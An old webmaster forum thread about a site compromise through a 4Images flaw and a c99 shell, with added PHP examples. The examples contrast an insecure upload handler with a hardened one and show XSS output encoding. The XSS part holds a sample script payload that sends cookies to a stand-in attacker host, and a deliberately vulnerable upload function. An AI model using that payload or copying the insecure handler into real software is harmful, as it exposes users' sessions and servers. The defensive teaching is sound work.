
Security Checks.



Generalissimo
12-13-2006, 08:50 AM
I just asked a friend to perform a quick security check on my sites. Within 15 minutes he had passwords to most of my sites.

What had I done so wrong? Firstly, I had the 4Images script running, which is full of exploits, one of which reveals all the user account names on the server.

He then used a dodgy upload form on one of my sites to upload a hacker tool called c99. Because the upload form (now deleted) allowed PHP uploads, somehow he was able to access that PHP file and use the usernames gained from the 4Images script to gain access to any user account on my server.

He could then just open PHP files using c99 and get passwords. The only secure sites were the ones coded by decent programmers who had used techniques such as echoing HTML instead of PHP files to produce sites.


This made me think a lot about security. I thought my sites were relatively secure, but in 15 minutes the vast majority of them were compromised.

He suggested:


Having different passwords for databases and user accounts
Having different passwords for every site
Checking all scripts before upload in future for the potential to upload PHP
Not using third-party scripts such as 4Images unless known to be secure (vBulletin is considered secure)

Chris
12-13-2006, 09:01 AM
Any site that allows user uploaded files needs extra layers of security.
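The chain in Generalissimo's post (an upload form that accepted a .php file, which then ran as a c99 shell) and Chris's point about extra layers come down to one handler. The following is an added example, not code from the thread or from 4Images: the first block is an assumed shape of a "dodgy" upload form, the second is a hardened replacement. The directory path, the constant names and the `store_upload` function are all assumptions for the example; the design relies on PHP's `finfo`, `random_bytes` and the GD extension.

```php
<?php
declare(strict_types=1);

// --- Vulnerable (assumed shape of the upload form described in the thread) ---
// Trusts the client-supplied name and writes it under the web root, so a file
// named shell.php (or shell.phtml, shell.php5, shell.php.jpg on lax servers)
// becomes a URL the attacker can request, and the server executes it.
function store_upload_vulnerable(array $file): string
{
    $dest = __DIR__ . '/uploads/' . $file['name'];
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// --- Hardened (added example) ---
const UPLOAD_DIR    = '/var/www/data/uploads';   // assumed path, OUTSIDE the document root
const MAX_BYTES     = 2 * 1024 * 1024;
const ALLOWED_TYPES = [                          // content-sniffed MIME type => extension WE assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_upload(array $file): string
{
    if (!isset($file['error']) || is_array($file['error'])) {
        throw new RuntimeException('Malformed upload');
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with code ' . $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // Layer 1: decide the type from the bytes, never from $_FILES['type'] or the client name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('Disallowed content type: ' . $mime);
    }

    // Layer 2: re-encode the image so PHP payloads hidden in EXIF/comments do not survive.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('Not a valid image');
    }

    // Layer 3: server-chosen random name with an extension derived from the detected type;
    // nothing the client typed reaches the filesystem.
    $ext  = ALLOWED_TYPES[$mime];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;

    switch ($ext) {
        case 'jpg': $ok = imagejpeg($img, $dest, 90); break;
        case 'png': $ok = imagepng($img, $dest);      break;
        default:    $ok = imagegif($img, $dest);      break;
    }
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('Could not write file');
    }
    return $name;
}

if (isset($_FILES['file'])) {
    try {
        $stored = store_upload($_FILES['file']);
        echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Layer 4 lives in the web server rather than in PHP: because `UPLOAD_DIR` is outside the document root, a stored file can only be served through a script that reads it and sets its own `Content-Type`, so even if every check above were bypassed the server would never interpret the upload as code. If the directory has to stay under the web root, the equivalent on Apache is an `.htaccess` in that directory with `php_flag engine off` (or a `<FilesMatch>` rule denying `.php`, `.phtml` and `.php5`), which is what "extra layers" means here: no single check is trusted to be the last one.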

Xander
12-13-2006, 01:41 PM
It's a good thing you had a friend who could do that and that you had it done. As I've progressed in PHP and MySQL, security in my code and in websites in general has become a real interest. Anywhere a person can enter something that is stored or even displayed (without being stored) can be dangerous. Just look at cross-site scripting (XSS): those can range from little annoyances to website-compromising problems. I've learnt a lot from rsnake's (http://ha.ckers.org) blogs and forum.
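Xander's point about input that is "stored or even displayed" is the stored/reflected XSS distinction, and the fix is the same for both: encode at the moment of output, for the context the value lands in. The following is an added example, not code from the thread; `$comment` stands in for a value read back from the database or straight from `$_GET`, the payload is constructed, and the helper `h()` is an assumed name.

```php
<?php
declare(strict_types=1);

// Constructed payload; in practice it arrives via a form field or URL parameter.
$comment = '<script>location="http://attacker.invalid/?c="+document.cookie</script>';

// Vulnerable: the comment is inserted as raw markup, so the browser executes it.
function render_vulnerable(string $comment): string
{
    return "<p>$comment</p>";
}

// Hardened: HTML-encode for the element context. ENT_QUOTES also covers attribute
// values; ENT_SUBSTITUTE prevents invalid UTF-8 from emptying the whole string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $comment): string
{
    return '<p>' . h($comment) . '</p>';            // shows the literal text, nothing runs
}

// The same value in other contexts needs that context's encoding, not just h():
function render_attribute(string $comment): string
{
    return '<input type="text" value="' . h($comment) . '">';   // quotes are encoded
}

function render_js(string $comment): string
{
    // JSON-encode with the HEX flags so </script> and quotes cannot break out of the block.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<script>var c = ' . json_encode($comment, $flags) . ';</script>';
}

echo render_vulnerable($comment), "\n";  // script tag reaches the browser intact
echo render_safe($comment), "\n";        // &lt;script&gt;location=&quot;...
echo render_attribute($comment), "\n";
echo render_js($comment), "\n";          // "\u003Cscript\u003E..." inside the string
```

Encoding on output rather than on input is what makes "displayed without being stored" safe too: a `$_GET` value echoed into the page goes through the same `h()` as a database row, and the stored copy stays unmodified so it can be re-used in a non-HTML context later.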